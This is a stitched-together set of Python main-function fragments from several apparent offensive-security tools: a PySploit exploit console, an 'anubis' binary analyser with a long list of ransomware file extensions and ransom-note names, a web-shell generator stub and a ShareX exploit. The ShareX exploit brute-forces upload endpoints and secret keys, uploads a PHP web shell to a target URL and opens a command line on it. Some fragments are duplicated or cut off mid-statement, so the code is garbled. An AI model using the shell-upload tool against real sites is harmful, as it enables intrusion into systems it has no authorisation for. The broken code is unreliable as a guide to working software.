def main():
parser = ArgumentParser(prog='PySploit',
usage='python3 PySploit.py [options]',
add_help=False)
help_arguments = parser.add_argument_group('help arguments')
help_arguments.add_argument('-v',
'--version',
action='version',
version="version 1.0")
help_arguments.add_argument('-h',
'--help',
action='help',
default=SUPPRESS,
help='Show this help message and exit.')
optional_arguments = parser.add_argument_group('optional arguments')
optional_arguments.add_argument('-c',
'--create',
dest='filename',
required=False,
help='create module sample')
args = parser.parse_args()
if len(argv) > 1:
if args.filename is not None:
filename = open(args.filename, 'w')
filename.write(sample)
else:
Banner()
while True:
interpreter().start_interpreter()
def main():
_parser = argparse.ArgumentParser(prog='anubis',usage='python3 anubis.py [options]', add_help=False)
help_arguments = _parser.add_argument_group('help arguments')
help_arguments.add_argument('-v', '--version', action='version', version="version 1.0")
help_arguments.add_argument('-h', '--help', action='help', default=argparse.SUPPRESS, help='Show a help message.')
_parser = argparse.ArgumentParser()
_parser.add_argument("--file", dest="file", help="binary path to analyze", required=False)
_args = _parser.parse_args()
Banner()
try:
if len(_args.file) > 0 :
_get_info = interpreter().fingerprinting(_args.file)
interpreter().processing_dict(_get_info)
interpreter().check_security(_args.file)
interpreter().section_inspection(_args.file)
interpreter().get_directory_imports(_args.file)
with open(_args.file, 'rb') as f:
b = f.read()
print(script_colors("yellow","[!]")+ " "+script_colors("blue","interesting metadata!"))
_exte = ['exe','doc','docx','xls','xlsx','xml','txt','jpg','mov','bmp','mp3', 'cry','crypto','CriptoLocker2015','darkness','enc','exx','kb15','kraken','locked','nochance','___xratteamLucked','__AiraCropEncrypted!','_AiraCropEncrypted','_read_thi$_file','02','0x0','725','1btc','1999','1cbu1','1txt','2ed2','31392E30362E32303136_[ID-KEY]_LSBJ1','73i87A','726','777','7h9r','7z.encrypted','7zipper','8c7f','8lock8','911','a19','a5zfn','aaa ','abc ','adk','adr','AES','AES256 ','aes_ni','aes_ni_gov','aes_ni_0day ','AESIR','AFD','aga','alcatraz','Aleta','amba','amnesia','angelamerkel','AngleWare','antihacker2017','animus','ap19','atlas','aurora','axx','B6E1','BarRax','barracuda','bart','bart.zip','better_call_saul','bip','birbb','bitstak','bitkangoroo','boom','black007','bleep','bleepYourFiles ','bloc','blocatto','block','braincrypt','breaking_bad','bript','brrr','btc','btcbtcbtc','btc-help-you','cancer','canihelpyou','cbf','ccc','CCCRRRPPP','cerber','cerber2','cerber3','checkdiskenced','chifrator@qq_com ','CHIP ','cifgksaffsfyghd','clf','cnc','code','coded','comrade','coverton','crashed','crime','crinf','criptiko ','crypton','criptokod ','cripttt ','crjoker','crptrgr','CRRRT ','cry','cry_','cryp1 ','crypt','crypt38','crypted','cryptes','crypted_file','crypto','cryptolocker','CRYPTOSHIEL','CRYPTOSHIELD','CryptoTorLocker2015!','cryptowall','cryptowin','crypz','CrySiS','css','ctb2','ctbl','CTBL','czvxce','d4nk','da_vinci_code','dale','damage','darkness ','darkcry','dCrypt','decrypt2017','ded','deria','desu','dharma','disappeared','diablo6','divine','doubleoffset','domino','doomed','dxxd','dyatel@qq_com','ecc','edgel','enc','encedRSA','EnCiPhErEd','encmywork','encoderpass','ENCR','encrypt','encrypted','EnCrYpTeD','encryptedAES','encryptedRSA','encryptedyourfiles','enigma','epic','evillock','exotic','exte','exx','ezz','fantom','fear','FenixIloveyou!!','file0locked','filegofprencrp','fileiscryptedhard','filock','firecrypt','flyper','frtrss','fs0ciety','f**k','Fuck_You','f****d','FuckYourData ','fun','gamma','gefickt','gembok','globe','glutton','goforhelp','good','gruzin@qq_com ','gryphon','GSupport','GWS','HA3','*****@*****.**','hakunamatata','hannah','haters','happyday ','happydayzz','happydayzzz','hb15','*****@*****.**','helpmeencedfiles','herbst','help','hnumkhotep','hitler','howcanihelpusir','html','hush','hydracrypt','iaufkakfhsaraf','ifuckedyou','iloveworld','infected','info','invaded','isis ','ipYgh','iwanthelpuuu','jaff','java','JUST','justbtcwillhelpyou','JLQUF','karma','kb15','kencf','keepcalm','kernel_complete','kernel_pid','kernel_time','keybtc@inbox_com','KEYH0LES','KEYZ ','eemail.me','killedXXX','kirked','kimcilware','KKK','kk','korrektor','kostya','kr3','krab','kraken','kratos','kyra','L0CKED','L0cked','lambda_l0cked','LeChiffre','legion','lesli','letmetrydecfiles','letmetrydecfiles','like','lock','lock93','locked','Locked-by-Mafia','locked-mafiaware','locklock','locky','LOL!','loprt','lovewindows','lukitus','madebyadam','magic','maktub','malki','maya','merry','micro','MRCR1','nalog@qq_com','nemo-hacks.at.sigaint.org','nobad','no_more_ransom','nochance','nochance ','nolvalid','noproblemwedecfiles','notfoundrans','nuclear55','uclear','obleep','odcodc','odin','OMG!','only-we_can-help_you','onion.to._','oops','*****@*****.**','[email protected] ','oshit','osiris','otherinformation','oxr','p5tkjw','pablukcrypt','padcrypt','paybtcs','paym','paymrss','payms','paymst','paymts','payransom','payrms','payrmts','pays','paytounlock','pdcr','PEGS1','perl','pizda@qq_com','PoAr2w','porno','potato','powerfulldecrypt','powned','pr0tect','purge','pzdc','R.i.P','r16m','R16M01D05','r3store','R4A ','R5A','r5a','RAD ','RADAMANT','raid10','ransomware','RARE1','rastakhiz','razy','RDM','rdmk','[email protected]','rekt','relock@qq_com','reyptson','remind','rip','RMCM1','rmd','rnsmwr','rokku','rrk','RSNSlocked ','RSplited','sage','salsa222','sanction','scl','SecureCrypted','serpent','sexy','shino','shit','sifreli','Silent','sport','stn','supercrypt','surprise','szf','t5019','tedcrypt','TheTrumpLockerf','thda','TheTrumpLockerfp','theworldisyours','thor','toxcrypt','troyancoder@qq_com','trun','trmt','ttt','tzu','*****@*****.**','unavailable','*****@*****.**','vault','vbransom','vekanhelpu','velikasrbija','venusf','Venusp','versiegelt','VforVendetta','vindows','viki','visioncrypt','vvv','vxLock','wallet','wcry','weareyourfriends','weencedufiles','wflx','wlu','Where_my_files.txt','Whereisyourfiles','windows10','wnx','WNCRY','wncryt','wnry','wowreadfordecryp','wowwhereismyfiles','wuciwug','www','xiaoba','xcri','xdata','xort','xrnt','xrtn','xtbl','xyz','ya.ru','yourransom','Z81928819','zc3791','zcrypt','zendr4','zepto','zorro','zXz','zyklon','zzz ','zzzzz','gmail_com_','india.com','crypt ','H_e_l_p_RECOVER_INSTRUCTIONS','LAST','nullbyte','READ_THIS_FILE_','BCXYZ11','pyt','rypt','ecipher','mail.crypt','elp_restore.','elp_your_files.','ow_to_recover.','nstall_tor.','eemail.me','q_com','estore_fi.','kr.net','ant your files back.','rypt','ECRYPT_INFO_','ocky_recover_instructions.txt','yp','ecret_code.txt','lFilesAreLocked.bmp','SISTANCE_IN_RECOVERY.txt','TENTION!!!.txt','nfirmation.key','crypt.exe','CRYPT_INSTRUCTION.HTML','CRYPT_INSTRUCTION.TXT','CRYPT_INSTRUCTIONS.HTML','CRYPT_INSTRUCTIONS.TXT','cryptAllFiles.txt','cryptAllFiles.txt','c_files.txt','LP_DECRYPT.HTML','LP_DECRYPT.lnk','LP_DECRYPT.PNG','LP_DECRYPT.TXT','LP_RESTORE_FILES.txt','LP_TO_DECRYPT_YOUR_FILES.txt','LP_TO_SAVE_FILES.txt','w to decrypt aes files.lnk','w_Decrypt.html','w_Decrypt.txt','wDecrypt.txt','wrecover+.txt','wto_recover_file.txt','MREADYTOPAY.TXT','STRUCCIONES_DESCIFRADO.TXT','st_chance.txt','ssage.txt','SSAGE.txt','r.','covery_file.txt','covery_key.txt','COVERY_KEY.TXT','store_files.txt','store_files.txt','ult.hta','ult.key','ult.txt','UR_FILES.HTML','UR_FILES.url']
_regedit = ['HKLM','HKCR','HKU','HKCU','HKEY_LOCAL_MACHINE','HKEY_CLASSES_ROOT','HKEY_USERS','HKEY_CURRENT_USER','HKEY_PERFORMANCE_DATA','HKEY_DYN_DATA','SOFTWARE','command','CurrentVersion']
_result = []
regex = r'[\w.%+-]+'
for s in interpreter().ascii_strings(b):
fil = s.s
file_ext = fil.split('.')[-1] if len(fil.split('.')) > 1 else None
extensions = [ext.replace('.', '') for ext in _exte]
if file_ext in extensions:
print(script_colors("yellow",'\t0x{:x}:').format(s.offset)+script_colors("lgray",'{:s}').format(s.s))
for calls in _regedit:
if re.findall(calls, s.s):
_result.append(script_colors("yellow",'\t0x{:x}:').format(s.offset)+script_colors("lgray",'{:s}').format(s.s))
if re.findall(regex,s.s):
if not s.s in _regedit and not s.s in _exte:
_result.append(script_colors("yellow",'\t0x{:x}:').format(s.offset)+script_colors("lgray",'{:s}').format(s.s))
for _find in set(_result):
print(_find)
else:
print("opcion no encontrada/..")
except Exception as e:
print("debes digitar por lo menos una opcion")
def validate_interpreter_mode(self):
try:
if self.command[0] == "clear" or self.command[0] == "Clear" or self.command[0] == "CLEAR":
clear()
elif self.command[0] == 'search' or self.command[0] == 'Search' or self.command[0] == 'SEARCH':
try:
interpreter.search_module(query = self.command[1])
except IndexError:
print(red('\n[!]') + green(' Invaild') + " syntax you should enter search query\n")
except TypeError:
pass
elif self.command[0] == "banner" or self.command[0] == "Banner" or self.command[0] == 'BANNER':
Banner()
elif self.command[0] == 'exit' or self.command[0] == "Exit" or self.command[0] == 'close' or self.command[0] == 'Close':
exit(0)
elif self.command[0] == "use" or self.command[0] == "Use" or self.command[0] == "USE":
from core.module_obtainer import obtainer
from core.module_interpreter import module_interpreter
try:
if obtainer.obtaining_info(obtainer, self.command[1]):
while True:
module_interpreter(self.command[1].split('/')[-1], self.command[1].split('/')[-1+1],self.command[1])
except IndexError:
print('\n' + red('[!]') + green(' You') + ' should enter the module name\n')
elif self.command[0] == 'restart' or self.command[0] == 'Restart' or self.command[0] == 'RESTART':
import core.module_interpreter # import module_interpreter module from core foloder
print('\n' + blue('[~]') + ' restarting the program ..... success\n')
reload(core.module_interpreter)
from core.module_interpreter import module_interpreter
elif self.command[0] == 'exec' or self.command[0] == 'execute':
try:
self.command.remove('exec' if self.command[0] == 'exec' else 'execute')
system(' '.join(self.command))
except IndexError:
print(red("\n[!] ") + green("Please ") + " enter the command\n")
elif self.command[0] == 'upgrade' or self.command[0] == 'Upgrade' or self.command[0] == 'UPGRADE':
interpreter.check_upgrade(interpreter)
else:
print('\n' + red('[!]') + green(' option') + ' not found\n')
except (KeyboardInterrupt,EOFError):
print('\n' + red('\n[!]') + green(' type') + gray(' exit') + ' to close the program\n')
except IndexError:
return None
from core.terminal import Terminal
from core.generate import Generator
from core.banner import Banner
from core.version import Version
import os
import argparse
import sqlite3 as lite
parser = argparse.ArgumentParser()
parser.add_argument("-u", help="Url")
parser.add_argument("-g", help="Generate Shell")
parser.add_argument("-p", help="Password")
args = parser.parse_args()
#Banner
banner = Banner()
banner.get_banner()
#Version Updater
version = Version()
version.update()
params = parser.parse_args()
#Init 1
def main(params):
if params.g and params.p:
shell.set_generator()
elif params.u and params.p:
terminal.loop()
else:
print("Type -h for help.")
if __name__ == '__main__':
import os
#ĐαɾƙSσυʅ
from core.hunter import Hunter
from core.banner import Banner
#ĐαɾƙSσυʅ
__autor__ = "ĐαɾƙSσυʅ"
__license__ = "MIT"
__Version__ = "2.1"
while True:
#banner and options
os.system('clear')
bann = Banner()
bann.banner()
print("\033[1;34m[01]\033[m \033[1;97m- Search\033[m")
print("\033[1;34m[02]\033[m \033[1;97m- Update\033[m")
print("\033[1;34m[00]\033[m \033[1;97m- Exit\033[m")
print("\033[1;97m_________________________\n\033[m")
opt = input("\033[1;97mOption\033[m \033[1;34m➤ \033[m\033[1;97m ")
time.sleep(1)
if (opt == '01' or opt == '1'):
#treatment domain
while True:
domain = input(
def __init__(self, module, category, module_input):
self.module_input = module_input
from core.module_obtainer import obtainer
obtainer.obtaining_info(obtainer, self.module_input)
module_completer() # start completer
self.module_name = module # get module_name variable from interpreter
self.category = category # get category variable from interpreter
self.options = obtainer.options
self.info = obtainer.info
self.exploit = obtainer.exploit
self.required = obtainer.required
while True:
try:
self.shell_ask = input(
underline("PySploit") + " " + self.category + "(" +
red(self.module_name) +
") >> ").split() # get input from user and split it
if self.shell_ask[0] == "clear" or self.shell_ask[
0] == "Clear" or self.shell_ask[0] == "CLEAR":
clear()
elif self.shell_ask[0] == "banner" or self.shell_ask[
0] == "Banner" or self.shell_ask[0] == "BANNER":
Banner()
elif self.shell_ask[0] == 'exit' or self.shell_ask[0] == "Exit" or self.shell_ask[0] == 'close' or self.shell_ask[0] == 'Close' or \
self.shell_ask[0] == "EXIT" or self.shell_ask[0] == "CLOSE" or self.shell_ask[0] == "back" or self.shell_ask[
0] == "Back" or self.shell_ask[0] == "BACK":
from core.main_completer import completer # import completer
reload(core.interpreter)
completer() # start completer
while True:
interpreter.start_interpreter(
interpreter) # restart interpreter
elif self.shell_ask[0] == "Help" or self.shell_ask[
0] == "help" or self.shell_ask[0] == "HELP":
self.help_message()
elif self.shell_ask[0] == 'set' or self.shell_ask[
0] == "Set" or self.shell_ask[0] == "SET":
try:
self.command_set_call(self.shell_ask[1],
self.shell_ask[2])
except IndexError:
print(
red('\n[!]') + green(' Invaild') +
" syntax you should enter option and new value\n")
elif self.shell_ask[0] == 'info' or self.shell_ask[
0] == 'Info' or self.shell_ask[
0] == 'INFO' or self.shell_ask[
0] == 'information' or self.shell_ask[
0] == 'Information' or self.shell_ask[
0] == 'INFORMATION':
self.command_info_call()
elif self.shell_ask[0] == 'exploit' or self.shell_ask[
0] == 'Exploit' or self.shell_ask[
0] == 'EXPLOIT' or self.shell_ask[
0] == 'run' or self.shell_ask[
0] == 'Run' or self.shell_ask[0] == 'RUN':
for o, v in obtainer.options.items():
if v[0] == "yes" or v[0] == "Yes" or v[0] == "YES":
if len(obtainer.options[str(o)][2]) <= 0:
print(
red('\n[!]') + green(' You') +
" should set {0} options\n".format(o))
else:
if self.required[
'start_required'] == True or self.required[
'start_required'] == "True" or self.required[
'start_required'] == "TRUE":
print('\n' + blue('[~]') +
' starting module ...\n')
self.exploit()
print('\n' + green('[#]') +
' end running module\n')
else:
self.exploit()
else:
if self.required[
'start_required'] == True or self.required[
'start_required'] == "True" or self.required[
'start_required'] == "TRUE":
print('\n' + blue('[~]') +
' starting module ...\n')
self.exploit()
print('\n' + blue('[~]') +
' end running module\n')
else:
self.exploit()
elif self.shell_ask[0] == 'check' or self.shell_ask[
0] == 'Check' or self.shell_ask[0] == 'CHECK':
if self.required['check_required'] == True or self.required[
'check_required'] == "True" or self.required[
'check_required'] == "TRUE":
obtainer.check()
else:
print('\n' + green('[#]') +
" Module don't have check option\n")
elif self.shell_ask[0] == 'exec' or self.shell_ask[
0] == 'execute':
try:
self.shell_ask.remove('exec' if self.shell_ask[0] ==
'exec' else 'execute')
system(' '.join(self.shell_ask))
except IndexError:
print(
red("\n[!] ") + green("Please ") +
" enter the command\n")
else:
print('\n' + red('[!]') + green(' option') +
' not found\n')
except (KeyboardInterrupt, EOFError):
print('\n' + red('\n[!]') + green(' type') + gray(' exit') +
' to close the program\n')
except IndexError:
return None
def main():
parser = ArgumentParser(prog='PySploit',
usage='python3 PySploit.py [options]',
add_help=False)
help_arguments = parser.add_argument_group('help arguments')
help_arguments.add_argument('-v',
'--version',
action='version',
version="version 1.2")
help_arguments.add_argument('-h',
'--help',
action='help',
default=SUPPRESS,
help='show this help message and exit.')
optional_arguments = parser.add_argument_group('optional arguments')
optional_arguments.add_argument('-c',
'--create',
dest='filename',
required=False,
help='create module sample')
optional_arguments.add_argument('-u',
'--upgrade',
required=False,
action='store_true',
help='create module sample')
optional_arguments.add_argument('-m',
'--manual',
required=False,
action='store_true',
help='show tool man page')
optional_arguments.add_argument('-i',
'--install',
required=False,
action='store_true',
help='install tool on your computer')
optional_arguments.add_argument('-un',
'--uninstall',
required=False,
action='store_true',
help='uninstall tool from your computer')
args = parser.parse_args()
if len(argv) > 1:
if args.filename is not None:
filename = open(args.filename, 'w')
filename.write(sample)
elif args.upgrade == True:
interpreter().check_upgrade()
elif args.manual == True:
try:
check_call('man /etc/pysploit-framework/docs/pysploit',
shell=True)
except CalledProcessError:
print(
red('\n[!]') + green(' Tool') +
" manual is not installed yet\n")
elif args.install == True:
install()
elif args.uninstall == True:
uninstall()
else:
Banner()
while True:
interpreter().start_interpreter()
from core.terminal import Terminal
from core.generate import Generator
from core.banner import Banner
from core.version import Version
import os
import argparse
import sqlite3 as lite
parser = argparse.ArgumentParser()
parser.add_argument("-u", help="Url")
parser.add_argument("-g", help="Generate Shell")
parser.add_argument("-p", help="Password")
args = parser.parse_args()
#Banner
banner = Banner()
banner.get_banner()
#Version Updater
version = Version()
version.update()
params = parser.parse_args()
#Init 1
def main(params):
if params.g and params.p:
shell.set_generator()
elif params.u and params.p:
terminal.loop()
else:
print("Type -h for help.")
if __name__ == '__main__':
def validate_module_interpreter_mode(self):
from core.module_interpreter import module_interpreter
from core.interpreter import interpreter
try:
if self.command[0] == "clear" or self.command[0] == "Clear" or self.command[0] == "CLEAR":
clear()
elif self.command[0] == "banner" or self.command[0] == "Banner" or self.command[0] == "BANNER":
Banner()
elif self.command[0] == 'search' or self.command[0] == 'Search' or self.command[0] == 'SEARCH':
try:
interpreter.search_module(query = self.command[1])
except IndexError:
print(red('\n[!]') + green(' Invaild') + " syntax you should enter search query\n")
except TypeError:
pass
elif self.command[0] == 'exit' or self.command[0] == "Exit" or self.command[0] == 'close' or self.command[0] == 'Close' or \
self.command[0] == "EXIT" or self.command[0] == "CLOSE" or self.command[0] == "back" or self.command[
0] == "Back" or self.command[0] == "BACK":
import core.interpreter
from core.main_completer import completer# import completer
reload(core.interpreter)
from core.interpreter import interpreter
completer() # start completer
while True:
interpreter.start_interpreter(interpreter) # restart interpreter
elif self.command[0] == "Help" or self.command[0] == "help" or self.command[0] == "HELP":
module_interpreter.help_message(module_interpreter)
elif self.command[0] == 'set' or self.command[0] == "Set" or self.command[0] == "SET":
try:
module_interpreter.command_set_call(module_interpreter,self.command[1], self.command[2])
except IndexError:
print(red('\n[!]') + green(' Invaild') + " syntax you should enter option and new value\n")
elif self.command[0] == 'info' or self.command[0] == 'Info' or self.command[0] == 'INFO' or self.command[0] == 'information' or self.command[0] == 'Information' or self.command[0] == 'INFORMATION':
module_interpreter.command_info_call(module_interpreter)
elif self.command[0] == 'exploit' or self.command[0] == 'Exploit' or self.command[0] == 'EXPLOIT' or self.command[0] == 'run' or self.command[0] == 'Run' or self.command[0] == 'RUN':
opt = []
val = []
stat = []
for o,v in obtainer.options.items():
opt.append(o)
val.append(v[2])
stat.append(v[0])
i = 0
while i < len(opt):
try:
if stat[i] == 'Yes':
if len(val[i]) <= 0:
print(red('\n[!]') + green(' You') + " should set {0} options\n".format(opt[i]))
break
else:
if obtainer.required['start_required'] == True or obtainer.required['start_required'] == "True" or obtainer.required['start_required'] == "TRUE":
print('\n' + blue('[~]') + ' starting module ...\n')
obtainer.exploit()
print('\n' + blue('[~]') + ' end running module\n')
break
else:
obtainer.exploit()
break
else:
if obtainer.required['start_required'] == True or obtainer.required['start_required'] == "True" or obtainer.required['start_required'] == "TRUE":
print('\n' + blue('[~]') + ' starting module ...\n')
obtainer.exploit()
print('\n' + blue('[~]') + ' end running module\n')
break
else:
obtainer.exploit()
break
except IndexError:
print
i += 1
elif self.command[0] == 'check' or self.command[0] == 'Check' or self.command[0] == 'CHECK':
if obtainer.required['check_required'] == True or obtainer.required['check_required'] == "True" or obtainer.required['check_required'] == "TRUE":
obtainer.check()
else:
print('\n' + green('[#]') + " Module don't have check option\n")
elif self.command[0] == 'exec' or self.command[0] == 'execute':
try:
self.command.remove('exec' if self.command[0] == 'exec' else 'execute')
system(' '.join(self.command))
except IndexError:
print(red("\n[!] ") + green("Please ") + " enter the command\n")
elif self.command[0] == 'upgrade':
interpreter.check_upgrade(interpreter)
else:
print('\n' + red('[!]') + green(' option') + ' not found\n')
except (KeyboardInterrupt,EOFError):
print('\n' + red('\n[!]') + green(' type') + gray(' exit') + ' to close the program\n')
except IndexError:
return None
def main():
if os.name == 'nt':
import colorama
colorama.init(convert=True)
Banner.print()
Logger.warning('use with caution. you are responsible for your actions')
Logger.warning(
'developer assume no liability and is not responsible for any misuse or damage'
)
Logger.empty_line()
parser = argparse.ArgumentParser(usage='%(prog)s [options]')
parser.error = Logger.error
parser.add_argument('-v',
'--verbose',
help='verbose',
dest='verbose',
action='store_true')
parser.add_argument('-s',
'--secret',
help='sharex secret key',
dest='secret',
metavar='')
parser.add_argument('--form-name',
help='multipart file form name',
dest='form_name',
metavar='',
default='sharex')
parser.add_argument('--field-name',
help='sharex secret key post data field name',
dest='field_name',
metavar='',
default='secret')
parser.add_argument('--no-cache',
help='disable cache',
dest='cache_enabled',
action='store_false')
mandatory_group = parser.add_argument_group('mandatory arguments')
mandatory_group.add_argument('-u',
'--url',
help='target url',
dest='url',
metavar='',
required=True)
brute_group = parser.add_argument_group('brute force arguments')
brute_group.add_argument('--brute-endpoint',
help='brute force file upload endpoint',
dest='brute_endpoint',
action='store_true')
brute_group.add_argument('--brute-secret',
help='brute force sharex secret key',
dest='brute_secret',
action='store_true')
brute_group.add_argument(
'--brute-field',
help='brute force sharex secret key post data field name',
dest='brute_field',
action='store_true')
brute_group.add_argument('--brute-form',
help='brute force multipart file form name',
dest='brute_form',
action='store_true')
if len(sys.argv) == 1:
parser.print_help()
return
args = parser.parse_args()
if not Validate.url(args.url):
Logger.error(f'invalid url: {args.url}')
if not Validate.active_url(args.url):
Logger.error('target is offline')
Logger.success('target is online')
cached_shell_url = Cache.get(args.url) if args.cache_enabled else None
if cached_shell_url is not None:
Logger.info('shell url fetched from cache')
shell_url = cached_shell_url['shell_url']
else:
url = args.url
field_name = args.field_name
secret = args.secret
form_name = args.form_name
if args.brute_endpoint:
if args.verbose:
Logger.info('brute forcing endpoint...')
url = Brute.endpoint(url)
if url is None:
Logger.error('endpoint not found')
Logger.success(f'endpoint found: \x1b[95m{url}')
if Brute.is_required(
url
): # checks if it's necessary to brute force secret key POST data field name and secret key
if args.brute_field:
if args.verbose:
Logger.info('brute forcing secret key field name...')
field_name = Brute.field_name(url)
if field_name is None:
Logger.error('field name not found')
Logger.success(f'field name found: \x1b[95m{field_name}')
if args.brute_secret:
if args.verbose:
Logger.info('brute forcing secret key...')
secret = Brute.secret(url, field_name)
if secret is None:
Logger.error('secret not found')
Logger.success(f'secret found: \x1b[95m{secret}')
if args.brute_form:
if args.verbose:
Logger.info('brute forcing multipart form name...')
form_name = Brute.form_name(url, secret, field_name)
if form_name is None:
Logger.error('form name not found')
Logger.success(f'form name found: \x1b[95m{form_name}')
if args.verbose:
Logger.info('attempting to upload php web shell...')
try:
shell_url = Exploit.upload_shell(
url, form_name, secret, field_name, args.verbose,
args.cache_enabled
) # program will exit if an error occurs (shell_url cannot be None)
except Exception:
Logger.error(
f'an error occurred while attempting to upload php web shell on target site'
)
Shell.command_line(shell_url)